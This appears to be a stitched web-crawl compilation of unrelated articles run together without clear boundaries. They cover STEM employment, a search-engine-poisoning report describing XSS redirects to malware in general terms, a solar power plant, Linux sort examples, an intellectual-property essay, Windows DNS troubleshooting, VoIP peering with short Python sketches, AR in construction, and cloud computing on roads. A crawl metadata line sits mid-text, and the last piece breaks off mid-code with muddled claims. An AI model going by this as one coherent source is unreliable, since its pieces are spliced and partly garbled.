Here Is a Hint Invest In STEM Workers
July 6, 2013
Have you ever heard of a STEM (science, technology, engineering, and math) worker? Probably not, but Brookings.edu reports in the article "The Hidden STEM Economy" that twenty-six million US jobs, 20 percent of the total, are in STEM fields. Since the economic downturn, recovery has been concentrated among workers with at least a bachelor's degree. Yet most STEM jobs do not require a four-year college degree and still pay well, and workers who do hold a degree in a STEM field are paid considerably more.
In a STEM-based economy, job growth, wages, patenting, exports, and employment rates are much higher. Another positive factor: a larger concentration of these jobs means less income inequality. Where is the government in all of this?
“Of the $4.3 billion spent annually by the federal government on STEM education and training, only one-fifth goes towards supporting sub-bachelor’s level training, while twice as much supports bachelor’s or higher level-STEM careers. The vast majority of National Science Foundation spending ignores community colleges. In fact, STEM knowledge offers attractive wage and job opportunities to many workers with a post-secondary certificate or associate’s degree. Policy makers and leaders can do more to foster a broader absorption of STEM knowledge to the U.S workforce and its regional economies.”
What can we learn from this? Invest in this end of the workforce! It also points to technology being on the growing side (again), which means new innovation in information retrieval.
Whitney Grace, July 06, 2013
Search Engine Poisoning: On The Rise
Today, Imperva released a report on search engine poisoning (SEP). SEP attacks manipulate, or "poison," search engines so that they display search results containing references to malware-delivering websites. There are multiple methods of performing SEP: taking control of popular websites; using the search engines' "sponsored" links to reference malicious sites; and injecting HTML code.
How has hacker interest in SEP grown? This is very difficult to gauge, and no formal statistics exist to quantify the problem. However, as the recent Bin Laden death reminds us, hackers leverage current events as they happen to dupe search engine users. The first description of the attack by researchers was in March 2008, by Dancho Danchev. One metric that helps gauge the growth of this problem is hacker forum discussions. For example, one major hacker forum saw a dramatic increase in discussions regarding search engine poisoning with XSS:
Year-over-year growth of SEP discussions in hacker forums (percent growth):
2008-2009: 212%
2009-2010: 121%
[Chart: Year-over-year growth of SEP discussions in hacker forums (raw numbers)]
How does Imperva detect SEP? Our probes were able to detect and track a SEP attack campaign from start to finish. The prevalence and longevity of this attack indicate not only how long it went undetected, but also that companies are not aware they are being used as conduits for an attack. It also highlights that search engines should do more to improve their ability to accurately identify potentially harmful sites and warn users about them.
The attack method we monitored returned search results containing references to sites infected with Cross Site Scripting (XSS). The infected Web pages then redirect unsuspecting users to malicious sites where their computers become infected with malware. This technique is particularly effective as the criminal doesn’t take over, or break into, any of the servers involved to carry out the attack. Instead he finds vulnerable sites, injects his code, and leaves it up to the search engine to spread his malware.
The prevalence of this attack has ramifications for search engines, especially Google. Current solutions that warn the user about malicious sites lack accuracy and precision, and many malicious sites continue to be returned unflagged. However, these solutions can be enhanced by studying the footprints of SEP via XSS. This allows more accurate and timely notification, as well as more prudent indexing. We hope Google and Yahoo! step up.
Governor Arnold Schwarzenegger today participated in the launch of Ausra's Kimberlina Solar Energy Facility in Bakersfield. The five megawatt (MW) solar thermal power plant, the first to come online in California in more than 15 years, is a demonstration facility for utility-scale thermal solar energy plants, such as the one Ausra is building in San Luis Obispo. That project will be a 177 MW solar thermal power plant whose energy PG&E has already agreed to purchase.
"We're proving that cost-competitive solar thermal power at utility scale is real. It works and is now reliably supplying power to California," Ausra chief executive officer Bob Fishman said.
Ausra's steam production technology can save customers millions of dollars in fuel costs, according to Fishman. Pressured steam can also augment power at conventional power plants, cutting costs and reducing their carbon footprint. It works by using large fields of mirrors to heat water in pipes that gets turned into steam. The steam is then used to drive turbines that generate power. And in addition to being used to generate power, the steam from the Kimberlina solar-thermal energy plant can also be used in such industrial processes as oil recovery and refinery, food processing and paper manufacturing. And these new solar-thermal energy plants use a fraction of the land of other solar-thermal technology implementations, Fishman said.
"This next generation solar power plant is further evidence that reliable, renewable and pollution-free technology is here to stay, and it will lead to more California homes and businesses powered by sunshine," Governor Schwarzenegger said. "Not only will this large-scale solar facility generate power to help us meet our renewable energy goals, it will also generate new jobs as California continues to pioneer the clean-tech industry."
Ausra's Kimberlina facility will employ seven full-time operators. When at full capacity, it will produce enough solar energy to power more than 3,500 homes. Ausra's larger, utility-scale San Luis Obispo facility will employ 350 Californians during construction and create 70 long-term jobs.
The Governor has set a goal of increasing California's renewable energy sources to 20 percent by 2010, and he supports reaching 33 percent by 2020. California's push to increase renewable energy and fight climate change will also boost our economy. According to an economic study released on Monday by the University of California at Berkeley and Next 10, California's policies will create as many as 403,000 jobs in the next 12 years and household incomes will increase by $48 billion. A separate economic study by Navigant Consulting, Inc. estimated that 214,000 permanent jobs in the solar energy sector alone will be generated in California.
"My vision is that when I fly up and down the state of California that I see every available space blanketed with solar-if it is parking lots, if it's on top of buildings, on top of prisons, universities, government buildings, hospitals. That is my goal," Gov. Schwarzenegger said at the launch of the power plant in Bakersfield.
On Tuesday, the governor announced that California has partnered with SunEdison to provide a zero-emission 8 MW solar photovoltaic power system to 15 California State University campuses. Further development is also under way by state departments, including the Department of General Services, Department of Corrections and Rehabilitation and Department of Mental Health, to generate approximately 7 MWs of solar power at five state prison sites and three state mental hospitals. Since 2006, 4.2 MWs of solar power have already been deployed at eight other state facilities through similar power purchase agreements.
To make solar power more accessible to California homeowners, the Governor signed his Million Solar Roofs Plan into law in August 2006. Now known as the California Solar Initiative, it will provide 3,000 MWs of additional clean energy and reduce the output of greenhouse gases by three million tons, equivalent to taking one million cars off the road. The $2.9 billion incentive plan for homeowners and building owners who install solar electric systems will lead to one million solar roofs in California by the year 2018.
Years ago, many companies relied on a perimeter defense strategy, assuming that would be enough to protect their network. But in today’s cyber-security landscape, threats can just as easily come from inside the network. According to the IBM 2015 Cyber Security Intelligence Index, 55 percent of all attacks were carried out by either malicious insiders or inadvertent actors. For example, modern malware can be unwittingly downloaded onto a remote employee’s laptop, lie dormant until the employee reconnects to the corporate network, and then spread to other endpoints on the network.
Network segmentation is key to containing the damage from such cyber threats. By creating different network segments and enabling employees to access only the information and servers based on their role, an organization can prevent the malware from spreading laterally to other endpoints and servers with sensitive data. Network segmentation provides the essential layer of security designed to protect valuable corporate assets from unauthorized access.
Linux sort command - Sort lines of text files
Himanshuz.chd
The man page of the sort command describes its purpose simply: sort lines of text files.
So we see that the main purpose of this command is to produce sorted output.
Linux sort command examples
1. A basic example
The very first input I tried consisted of some random letters.
Here is what I tried:
$ sort
b
z
a
w
s
And here is the output:
a
b
s
w
z
So we see that the output was produced in sorted form.
2. Sort numbers
In the following example, I filled a text file (sort.txt) with some random numbers.
$ cat sort.txt
8
2
6
1
5
3
Then I used the sort command with sort.txt as the input file to the command.
$ sort sort.txt
1
2
3
5
6
8
So we see that a sorted list of numbers was produced in the output.
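One caveat worth adding here (my addition, not in the original post): the example above happens to work because every number is a single digit. By default, sort compares lines as text, so multi-digit numbers can land in surprising places; the -n option compares by numeric value instead.

```shell
# Default comparison is character by character, so "10" sorts before "2".
printf '10\n9\n2\n' | sort
# Output:
# 10
# 2
# 9

# -n compares lines by their numeric value.
printf '10\n9\n2\n' | sort -n
# Output:
# 2
# 9
# 10
```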
3. Sorting words
In this example, the sort.txt file is filled with some words.
$ cat sort.txt
UK
Australia
Newzealand
Brazil
America
Now, this file is given as input to the sort command:
$ sort sort.txt
America
Australia
Brazil
Newzealand
UK
So we see that the words were sorted in dictionary order. Even words beginning with the same letter were sorted according to their succeeding letters.
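A related wrinkle not covered in the original post: how mixed-case words sort depends on the locale. In the traditional C locale, every uppercase letter sorts before every lowercase one; the -f (--ignore-case) option folds case while comparing. LC_ALL=C is pinned below so the behavior is reproducible.

```shell
# In the C locale, 'Z' (ASCII 90) sorts before 'a' (ASCII 97).
printf 'apple\nZebra\n' | LC_ALL=C sort
# Output:
# Zebra
# apple

# -f folds lowercase to uppercase during the comparison.
printf 'apple\nZebra\n' | LC_ALL=C sort -f
# Output:
# apple
# Zebra
```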
4. Use sort to directly write data in sorted manner
This command can be used to write unsorted input data to a file directly in sorted form.
Here is how this can be done:
$ sort > sort.txt
9
Hello
4
Why
8
Bye
After the above operation, let's check the file contents:
$ cat sort.txt
4
8
9
Bye
Hello
Why
So the output suggests that the input was first sorted and then written to the file.
5. Write sorted concatenation of all input files to standard output
If more than one file is provided as input, the sort command produces a sorted concatenation on stdout.
Here is an example:
$ cat sort1.txt
7
4
9
1
$ cat sort2.txt
8
5
6
2
Here is the output:
$ sort sort1.txt sort2.txt
1
2
4
5
6
7
8
9
So we see that a sorted concatenation was produced in the output.
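A related flag the original post does not mention: when the input files are each already sorted individually, the -m option merges them without performing a full re-sort, which is cheaper for large pre-sorted inputs.

```shell
# Create two files that are each already in sorted order.
printf '1\n4\n7\n9\n' > sorted1.txt
printf '2\n5\n6\n8\n' > sorted2.txt

# -m merges the pre-sorted inputs instead of re-sorting everything.
sort -m sorted1.txt sorted2.txt
# Output:
# 1
# 2
# 4
# 5
# 6
# 7
# 8
# 9

rm sorted1.txt sorted2.txt
```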
6. Write the result of sort to a file
The output of the sort command can be written to a file by using the -o option.
Here is how it's done:
$ sort -o sort.txt
4
9
2
8
1
Now let's check the file:
$ cat sort.txt
1
2
4
8
9
So we see that the output was actually written to the file whose name was supplied to sort through the -o option.
7. Sort months
There is an interesting option, -M, through which month names can be sorted.
Here is an example:
$ sort -M > sort.txt
DEC
JAN
FEB
Now, let's check the file contents for the output:
$ cat sort.txt
JAN
FEB
DEC
So we see that the sort command actually sorted the month names chronologically.
8. Sort human-readable numbers
Another interesting option, -h, lets sort order human-readable sizes such as 1K, 3M, and 2G.
Here is an example:
$ sort -h > sort.txt
2G
1K
3M
Now, let's check the file for the output:
$ cat sort.txt
1K
3M
2G
So we see that the sizes were sorted from smallest to largest.
9. Produce reverse sorted results
Using the -r option provided by the sort command, the results can be produced in reverse order.
$ sort -h -r > sort.txt
2G
1K
3M
Here is the output of the file:
$ cat sort.txt
2G
3M
1K
So we see that this time the sorting results were written in reverse sorted order.
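One more flag worth knowing (my addition, not from the original post): -u drops duplicate lines from the sorted output, and it combines freely with other options such as -n.

```shell
# -u keeps only the first of any run of equal lines.
printf '3\n1\n2\n3\n1\n' | sort -n -u
# Output:
# 1
# 2
# 3
```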
10. Compare according to string numerical value
This can be done using the -n option.
Here is the input:
$ cat > sort.txt
7 mangoes
4 oranges
9 grapes
1 apple
Here is the output:
$ sort -n sort.txt
1 apple
4 oranges
7 mangoes
9 grapes
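Building on the last example, an addition not in the original post: the -k option sorts on a specific field rather than on the whole line. Sorting the same lines on field 2 orders them by fruit name instead of by quantity.

```shell
# -k2 starts the sort key at the second whitespace-separated field.
printf '7 mangoes\n4 oranges\n9 grapes\n1 apple\n' | sort -k2
# Output:
# 1 apple
# 9 grapes
# 7 mangoes
# 4 oranges
```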
The recently shelved SOPA (Stop Online Piracy Act) and PIPA (PROTECT-IP Act) bills that were up for consideration in the U.S. Congress have once more brought to the forefront a touchy subject, particularly with regard to the Internet: intellectual property (IP). With IT becoming such a critical underpinning of the U.S. and world economies, a frank reconsideration of the meaning and role of IP is long overdue.
Re-evaluating Assumptions About Intellectual Property
One missing item on the agenda of discussing IP legislation like SOPA and PIPA revolves around the meaning, scope and legal status of the term intellectual property. This article is by no means intended to resolve the issue, but merely to point out some considerations that suggest that the predominant conception of IP may well be flawed. Stopping draconian bills like SOPA and PIPA was necessary for reasons having nothing to do with IP, but in anticipation of the next round of legislation (and it will arrive sooner or later), an honest discussion of intellectual property is desperately needed.
IP laws are ostensibly intended to protect the nonmaterial goods produced by individuals and companies. In the context of IT and data centers, such goods encompass software, innovative design practices or devices, and product/company names and logos (which also applies beyond these industries). By prohibiting others from simply copying, by whatever means, these protected items, those who developed them are enabled to earn a return on their invested labor and capital. But like so many concepts that sound good on paper, IP can also be abused.
Examples of copyrights and patents (legal recognitions of IP) range from the understandable to the downright absurd. For instance, it’s easier to believe that a musician has the right to control distribution of a recording he or she made than it is to believe that a company has the right to patent human genes (“How human genes become patented”)—which, incidentally, that company did not create. Similarly, some companies have gained patents on seeds, imposing legal restrictions on farmers’ ability to collect and use seeds from the next generation (“Saving Seeds Subjects Farmers to Suits Over Patent”). But where is the line to be drawn between a common-sense use of IP law and a patently (no pun intended) absurd use?
Complicating the situation is the digital nature of information—music, software, images, text and so on. To computers, these are nothing but long binary numbers (010011101011100010011...). Can a company or individual own the rights to a binary number? But what if two programs use the same binary number for two different things—one to play back a song, one to produce an image? (This is an unlikely occurrence, but it’s conceivable.) And how much of the number is actually owned? For example, if one or two bits are reversed, is it the same number for IP purposes?
And even if we look at the actual content rather than the underlying digital numbers—the notes of music, the shapes and colors of an image, the words of a text, and so on—how much difference is enough difference to objectively avoid legal jeopardy in regard to infringement of IP rights? Are IP rights applicable when no commercial benefit is gained? For example, the Girl Scouts were asked to pay to be able to sing certain tunes around the campfire (“Ascap Asks Royalties From Girl Scouts, and Regrets It”). Again, the extent of IP rights is far from clear: common sense would tend to find more favor in protecting a musician’s recording (say, in MP3 format) than in preventing some Girl Scouts from singing some hit tune among themselves.
SOPA and PIPA Highlight Need for Frank Discussion
The SOPA and PIPA bills were ostensibly intended to protect IP rights on the Internet, but the recent shutdown of Megaupload proves that these bills weren't really needed to enable enforcement of IP rights on the Internet. (For a simple discussion of the real problems with SOPA and PIPA, see the Khan Academy's lucid presentation.) What these bills do illustrate is an overreaction to IP infringement on the Internet. And similar bills will continue to come up in Congress until one of them passes, unless a clearer understanding of what constitutes IP and IP rights is developed.
Although the fact that IP laws are violated regularly by a large number of Internet users doesn’t mean that those laws are unwarranted, it does raise some question about whether the laws do not somehow miss the reality of the digital situation. In some sense, the question really does come down to whether an artist, musician, programmer or other individual can own a number—or, more to the point, whether he or she can control what others do with that number.
The Economics of IP
Intellectual property is an attempt to extend the concepts that apply in the realm of physical possessions to the realm of concepts, ideas and other immaterial things. When you take someone’s car, you’re taking a one-of-a-kind object (there’s only one of that exact car in existence)—the violation in this case is tangible, and the stolen item is irreplaceable (in the sense that there’s only one “that car”). But what about a software program in digital format? Innumerable copies can be created in a manner that has no effect on the physical ownership of the original by the programmer, company or whomever has it.
Thus, from the perspective of the owner, in exclusive terms of physical/digital possessions, nothing has changed. Of course, the counterargument is that the uncontrolled duplication of the program has an economic effect: it essentially eliminates any monetary value of the program (or whatever the item may be; by the laws of economics, an infinite supply means the price must fall to zero). The owner could then state that although the program wasn't stolen, its value was.
But granting that actions that reduce the monetary value of an object are no less than theft, one opens a can of worms that effectively leads to necessary regulation of all economic activity. For example, say two programmers write two different programs that do exactly the same thing (but, to avoid IP considerations, they do it in two entirely different ways). Assume the value of these two programs is thus equivalent in this sense. But if one programmer offers his version for sale at half the price of the other—killing the sales of the more expensive version—is that programmer, in effect, “stealing value” from the other?
This small example illustrates the kind of economic and philosophical morass that a discussion can fall into with regard to IP. This is not, however, to say that IP has absolutely no place in the law or common morality—nor is it to say that IP has a definite place in the same. This is simply to note that an unquestioning allegiance to the prevailing notions of IP (particularly when purveyed by large corporations with huge financial stakes in the discussion) can lead to absurdities, like companies owning the rights to your genes.
What we need, therefore, is a healthy debate on the topic of IP. This debate shouldn’t be limited to laws like SOPA and PIPA, but should focus on what truly constitutes IP and whether the law has a role. The debate need not be just a revolutionary exercise in tearing down an established dogma, but should be a means for both sides to clarify their positions and, one would hope, reach a broader consensus. At that point, any necessary laws can be passed to protect both rights holders and everyone else.
Photo courtesy of Kevin Spencer.
Troubleshoot Windows DNS Problems
In any enterprise, DNS services are a crucial backbone for network connectivity. DNS is used for name resolution, allowing one client to locate another client. If DNS fails, it will disrupt connectivity to the Internet. In this article, we'll consider some common issues caused by misconfiguration of DNS.
Incorrect Configuration of Primary/Secondary Zones
Creating a new zone, whether primary or secondary, is just a matter of few clicks. However there are other settings that you might want to check to ensure that DNS is working properly.
Zones are not replicating
You have created a new zone, but for some reason it is not replicating with the primary zone. There might be many reasons for this, but here are some possibilities:
- Zone Transfers are enabled and the secondary DNS server IP is not specified. As a best practice, it is always recommended to specify the IP addresses of the servers that will need to download the zone data from the primary zone. See Figure 1.
- Secure Dynamic Updates are enabled, and the secondary zone does not have Active Directory Integrated DNS zones configured. Secure Dynamic Updates only work if both DNS servers are using Active Directory Integrated DNS zones. If either DNS server is not using Active Directory Integrated DNS zones, or is running BIND (Linux), then Dynamic Updates need to be set to Non-Secure. See Figure 2.
Figure 1: Zone Transfers is enabled and only replicating to a specific server.
Figure 2: Dynamic Updates is set to Secure by default for Windows Server DNS.
Users are not able to do DNS queries from your DNS Server
You have done the basic troubleshooting, and users are able to ping the DNS server and get a response. However, when they try to query specific DNS zones hosted on your DNS server, the queries fail. In this case, you might want to check:
- The "Everyone" group does not have read permission for the zone. Due to misconfiguration, the "Everyone" group might not have the necessary permission entries for the DNS zone. See Figure 3.
Figure 3: Everyone group has permission to read and list the content of the Zone
User PCs are not registering into the DNS zone
A user's PC is able to connect to the network, but the computer name does not get registered in the DNS server. Three common possibilities are:
- The TCP/IP settings properties window does not have Register this connection's addresses in DNS selected. This option will ask the DNS client to register the computer name into the DNS server. See Figure 4.
- Authenticated Users group does not have the correct permission set for the DNS zone. Authenticated Users group needs to have the permission to create child objects for the DNS zone. See Figure 5.
- DNS Dynamic Updates is not enabled in DHCP settings. To be exact, the DNS client will ask the DHCP Server to create an A and PTR record in the DNS Server. Hence, the DHCP Server will need to have the Enable DNS dynamic updates according to the settings below selected. See Figure 6.
Figure 4: Register this connection's addresses in DNS must be selected.
Figure 5: Authenticated users group must have permission to Create All Child Objects, else it will not create an A record in the DNS Server.
Figure 6: Enable DNS Dynamic Updates in DHCP settings.
DNS Server configuration
If the DNS server is not configured properly, the entire DNS service will be affected. Here are some common configuration issues administrators should look out for:
DNS queries not responding with any response
Assuming that Internet connectivity from the DNS server to the outside world is still good, the problem could lie with the forwarder or root hints. Here's why:
- Forwarder DNS servers are down. Depending on your network configurations, you might have set up forwarder DNS. If all of the forwarder DNS servers are down, this will affect the DNS server at your site. See Figure 7.
- Root hints are missing, or the root hint servers are down. Root hints allow DNS queries to be resolved by using the root DNS servers, without using an intermediate DNS server or a forwarder. See Figure 8.
Figure 7: Configure Forwarders in DNS Server.
Figure 8: Root Hints name servers are shown in this list.
DNS is Important
DNS is crucial in every corporate environment, whether for internal or external hostname resolution. The above configuration issues are not exhaustive, but do include some of the most common problems administrators miss during routine monitoring and troubleshooting. Do you have any other DNS tips that you would like to share? Post them below!
Jabez Gan is a Microsoft Most Valuable Professional (MVP) and is currently the Senior Technical Officer for a consulting company that specializes in Microsoft technologies. His past experience includes developing technical content for Microsoft Learning, Redmond, Internet.com and other technology sites, and deploying and managing Windows Server systems. He has also spoken at many technology events, including Microsoft TechEd Southeast Asia. A contributing author for MCTS: Windows Server 2008 Application Platform Configuration Study Guide by Sybex, he is often sourced to act as a subject matter expert (SME) in Windows server and client technology. He can be reached at firstname.lastname@example.org
Teachers in Pennsylvania are being encouraged to use increasing amounts of technology in the classroom. The downside to this trend is the increased risks that students face online by accessing inappropriate or potentially harmful content.
There’s no doubt that the increased use of technology in Connecticut classrooms enhances students’ learning. As a district technology coordinator in Connecticut, how can you ensure your students are safe online and acting responsibly? Anti-bullying policies and blocking, you may cry. But is this enough?
As mobile devices infiltrate school, work, and personal life, we live in a society that is ‘always on’, with constant access to information. This trend presents school districts in Georgia with the challenge of ensuring all students remain safe online.
As school districts in Oregon continue to invest in technologies such as Chromebooks to enhance learning, the chance of students' exposure to online risks is increasing. What can schools in Oregon be doing to ensure their students are safe?
The VoIP Peering Puzzle, Part 1: Concepts and Challenges
If you've been reading Enterprise VoIPplanet.com, you have doubtless come across the term VoIP peering; it is certainly among the top buzzwords in today's networking culture.
Webster's defines peer as "one that is of equal standing with another." But to fully understand the concepts of VoIP peering, we must roll back the clock a century or so, and examine the architecture of the first telephone systems.
Alexander Graham Bell's invention of the telephone in 1876 was initially available to a limited few: those who could afford not only the telephone instrument, but also physical connections to others who possessed similar technical foresight and economic means. Switching systems had not yet been developed, so if Dr. Smith needed a telephone line to Pharmacist Jones, a physical cable was installed between their respective locations to make that connection.
With that physical connection established between Smith and Jones, they became peers, or individuals with equal standing with one another, at least as far as communicating by telephone was concerned.
Unfortunately, if either Smith or Jones wanted to consult with Dentist Brown, additional lines would have to be constructed, and before long large cities such as New York were draped with telephone poles and cables connecting the various locations of the rich and famous.
Switching systems changed the telephone network from a point-to-point to a point-to-multipoint topology, and over time gave rise to the interconnection of central offices and switching systems that comprise the Public Switched Telephone Network, or PSTN, that we know today.
Fast forward a century, and we see that the packet-based Internet Protocol (IP) has emerged as the dominant communications medium. Many organizations, from small businesses to large, multi-location enterprises, have embraced IP as their data transport protocol of choice, creating both local and wide area networks (LANs and WANs) on an IP infrastructure.
However, since they are not connected by a ubiquitous IP grid, these networks are frequently referred to as IP islands, and communication between islands, not to mention with much of the outside world, requires additional connectivity.
For example, an enterprise with, say, one location in New York and another in Chicago could procure a high-speed leased line, such as a T1 or T3 circuit, from an inter-exchange carrier to connect its two "islands". In doing so, however, it would be doing little more than recreating the point-to-point network of Alexander Graham Bell's era. As long as you only need to talk with people within your privately interconnected island network, the enterprise VoIP system can stand alone.
However, as soon as you need to speak with someone in the outside world (often referred to as an "off-net call"), your inter-island connections no longer get the job done. To get off your archipelago, you need a ubiquitous bridging connection. Historically, this has been provided by the PSTN, and that PSTN connection can become the limiting factor, dictating the cost, quality, and application support for the end-to-end connection.
Making VoIP the best it can be
Thus, if the PSTN connection between VoIP islands is replaced with an IP network, several immediate benefits emerge.
- First, the "per minute" charges associated with the PSTN go away, since IP networks transmit information in packets, independent of the connection time.
- Second, the hardware costs associated with IP-to-PSTN gateways are eliminated.
- Third, the signal degradation caused by the multiple format conversions that occur where the IP network connects to and from the PSTN is eliminated, which should improve voice quality.
- Fourth, multimedia applications, such as video conferencing, which might not be able to traverse the PSTN because of bandwidth constraints, can now flow on an end-to-end basis.
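The bandwidth arithmetic behind these benefits is easy to sketch. A G.711 stream carries 64 kbit/s of voice payload, but each 20 ms packet also carries roughly 40 bytes of IP/UDP/RTP headers, so the on-the-wire rate is higher. The figures below are standard textbook codec values, not numbers taken from this tutorial:

```python
def voip_bandwidth_kbps(payload_kbps, packet_ms, header_bytes=40):
    """On-the-wire bandwidth for one voice stream, including
    IP (20) + UDP (8) + RTP (12) = 40 bytes of headers per packet."""
    payload_bytes = payload_kbps * 1000 / 8 * (packet_ms / 1000)  # bytes per packet
    packets_per_sec = 1000 / packet_ms
    total_bits = (payload_bytes + header_bytes) * 8 * packets_per_sec
    return total_bits / 1000

# G.711 (64 kbit/s payload, 20 ms packets) -> 80 kbit/s on the wire
g711 = voip_bandwidth_kbps(64, 20)
# G.729 (8 kbit/s payload, 20 ms packets) -> 24 kbit/s on the wire
g729 = voip_bandwidth_kbps(8, 20)
```

Note how header overhead dominates for low-bitrate codecs: G.729 compresses the voice eightfold, yet the wire rate drops only by about a factor of three.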
There are two different types of peering arrangements.
The first is called bilateral peering, in which two locations are connected in a point-to-point topology over an IP network. In this case, the two peers may be two locations of the same enterprise, or locations of two distinct enterprises with a significant amount of inter-network traffic (such as trading partners; for example, a manufacturer and its supplier). Some agreement is reached between the parties to share the costs of the connection.
The second type of peering arrangement is called multilateral peering, also known as federation peering. This arrangement resembles a star topology network, in which the islands all connect to a central location, typically a provider of peering services.
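The scaling difference between the two arrangements mirrors the Bell-era wiring problem: fully meshed bilateral peering among n islands needs n(n-1)/2 links, while a federation hub needs only n. A quick sketch:

```python
def bilateral_links(n):
    """Point-to-point links needed to fully mesh n islands."""
    return n * (n - 1) // 2

def federated_links(n):
    """Links needed when every island connects to one central
    peering provider (star topology)."""
    return n

# Ten islands: 45 bilateral circuits, versus 10 connections to a hub
```

This is the same economics that drove the original telephone network from point-to-point wiring to central-office switching.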
Peering: good, but not simple
As might be expected, the peering relationship is not as simple as just plugging one network into another. Much like other computer and communications architectures, there are a number of issues that must be addressed:
- The physical media for interconnection, such as a fast Gigabit Ethernet backbone.
- Signaling, or call setup (establishment) and teardown (disconnect) messages that are transmitted from the sender to the receiver. Different networks use varying signaling protocols, which requires a meeting of the minds (protocol conversion) before an end-to-end connection can be successful.
- Registry services, with databases to cross-reference telephone numbers and IP addresses.
- Business issues, defining pricing, billing, traffic reporting, and other contractual terms between the parties.
- Location services, identifying where the desired application is located.
- Network security, preventing network topology information, or other proprietary information, from inappropriate disclosure.
- Government compliance, assuring that access to emergency services (E911) and law enforcement call monitoring functions can be maintained.
- End-to-end quality of service, or QoS, as the voice signal undergoes various format conversions, from the original analog to digital and back to analog at the recipient, perhaps traversing multiple IP-TDM-IP network connections en route.
- Identity notification, such as Caller ID.
- Preventing unwelcome calls, known as Spam over Internet Telephony (SPIT).
- Adherence to emerging standards, thus minimizing multi-vendor interoperability issues.
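One standardized approach to the registry problem in the list above is ENUM (RFC 6116), which turns an E.164 telephone number into a DNS domain under e164.arpa, where NAPTR records can point to a SIP URI. A minimal sketch of the number-to-domain mapping (the lookup itself would be an ordinary DNS query, not shown here):

```python
def enum_domain(e164_number):
    """Map an E.164 number (e.g. '+15551234567') to its ENUM domain
    per RFC 6116: strip non-digits, reverse the digits, separate
    them with dots, and append 'e164.arpa'."""
    digits = [d for d in e164_number if d.isdigit()]
    return ".".join(reversed(digits)) + ".e164.arpa"

# '+15551234567' -> '7.6.5.4.3.2.1.5.5.5.1.e164.arpa'
```

A peering provider resolving that domain can discover which network "owns" the number, which is exactly the cross-referencing role the registry-services bullet describes.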
These and other issues must be addressed in order to implement a successful peering operation, and they will be examined in future tutorials. Our next tutorial will look at the developing standards for VoIP peering, beginning with the network peering architecture developed by the Internet Engineering Task Force (IETF).
Copyright Acknowledgement: © 2006 DigiNet ® Corporation, All Rights Reserved
Mark A. Miller, P.E. is President of DigiNet ® Corporation, a Denver-based consulting engineering firm. He is the author of many books on networking technologies, including Voice over IP Technologies, and Internet Technologies Handbook, both published by John Wiley & Sons. | <urn:uuid:59c2a495-9085-4999-904e-f2e903e4c857> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/unified_communications/The-VoIP-Peering-Puzzle151Part-1-Concepts-and-Challenges-3644066.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00090-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.948615 | 1,430 | 3.015625 | 3 |
Rob Charlton, CEO, Space Group & Adam Ward, Director, BIM Technologies
In an age of perpetual advancing technology, it’s often difficult to keep up with what’s going to be the “next big thing”.
Traditional construction methods are fast being overtaken by modern building processes and what we're now terming digital construction.
As industry innovators, we're championing the leap from digital construction to augmented construction. There is scope for augmented reality to play a major role in helping construction teams in the field understand how various systems and components fit together during production. More importantly, it can give architects a route to take their designs into a virtual environment before the high-risk move to construction.
The current process is that a structure is designed in 3D, transferred to 2D documents, and then built in three dimensions on site. The transition from 3D to 2D and back again can often lead to errors; so what if we could cut this middle step out altogether?
Just imagine being able to put on an AR headset and see exactly which line on a 2D construction document corresponds to a given object, such as a section of pipe or cable network. Being able to bring drawings into a physical model, giving a sense of scale, proportion, form and space.
In this webinar, we’ll take you through the following:
- What is augmented construction?
- Technological advancements and the benefits they bring to the industry
- How to use AR effectively
- What role does data play in this?
- Example projects: who's using this now
- The next step
Cloud computing is making infrastructural breakthroughs on the roads, even as the term 'infrastructure' takes on a meaning more technological and virtual than its original one. Infrastructure as a Service (IaaS) is usually heard in computing contexts, but it may soon be possible to think outside the box and apply the idea to the physical tarmac. In Europe, for example, plans are under way to ensure that the operability of transcontinental routes improves. Small operators will be able to collaborate with large consortiums to make use of every means of transport possible, be it road or rail.
Surface transport that uses trucks or locomotives to convey bulky merchandise in a single trip can help enhance operability. Several small-scale suppliers can band together to use a single carrier rather than each paying separately to move goods by various means. Cloud computing enables them to select a given route on a shared map and brings the suppliers together to agree on one large carrier that conveys their goods in a single run. This echoes economies of scale: instead of many nearly empty containers being on the road simultaneously, several suppliers can communicate and collaborate on a single trailer to do a job that many half-empty carriers would do expensively.
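The consolidation idea can be illustrated with a toy bin-packing sketch: given several suppliers' load sizes and a trailer capacity, a first-fit-decreasing pass shows how few shared trailers the combined booking actually needs. All numbers here are invented for illustration:

```python
def consolidate(loads, capacity):
    """First-fit-decreasing: pack load sizes into as few trailers as
    a simple greedy pass allows. Returns a list of trailers, each a
    list of the load sizes it carries."""
    trailers = []
    for load in sorted(loads, reverse=True):
        for trailer in trailers:
            if sum(trailer) + load <= capacity:
                trailer.append(load)
                break
        else:
            trailers.append([load])  # no trailer had room: open a new one
    return trailers

# Five shipments that would otherwise run half-empty fit in two
# shared trailers of capacity 10
trailers = consolidate([6, 5, 4, 3, 2], 10)
```

A real consolidation service would also weigh routes, deadlines, and pricing, but the core saving, fewer, fuller vehicles, is this computation.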
Cloud computing is also helping to improve safety on the road. The latest breakthrough comes from Ireland, where a student group has received recognition for an innovative gadget that alerts reckless drivers. It stores and displays data using the same mechanics as a conventional cloud. Sensors on the vehicle's engine relay information about upcoming crossings (in one area, intersections number 29 in a stretch of 7 km) and thus help reduce casualties.
Maps such as Google's may also be quite handy for teaching the rules of the road. When drivers face route decisions, they only have to consult the maps to learn which route is most convenient. The same applies when an emergency blocks the only road a driver knows and traffic is gridlocked: a quick tour of the on-screen map of the inner streets is enough to negotiate a way out of the snarl-up and reach the destination in time.
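Under the hood, negotiating a detour of this sort is a shortest-path computation. A toy sketch using Dijkstra's algorithm over an invented street grid (node names and distances are made up for illustration):

```python
import heapq

def shortest_route(graph, start, goal, blocked=frozenset()):
    """Dijkstra over a street graph; 'blocked' edges (given as
    (from, to) pairs) are skipped, modeling a detour around an
    incident on the usual road."""
    queue, seen = [(0, start, [start])], set()
    while queue:
        cost, node, path = heapq.heappop(queue)
        if node == goal:
            return cost, path
        if node in seen:
            continue
        seen.add(node)
        for nxt, dist in graph.get(node, {}).items():
            if (node, nxt) in blocked:
                continue
            heapq.heappush(queue, (cost + dist, nxt, path + [nxt]))
    return None  # goal unreachable

# Toy grid: main road A-B-D versus inner streets A-C-D
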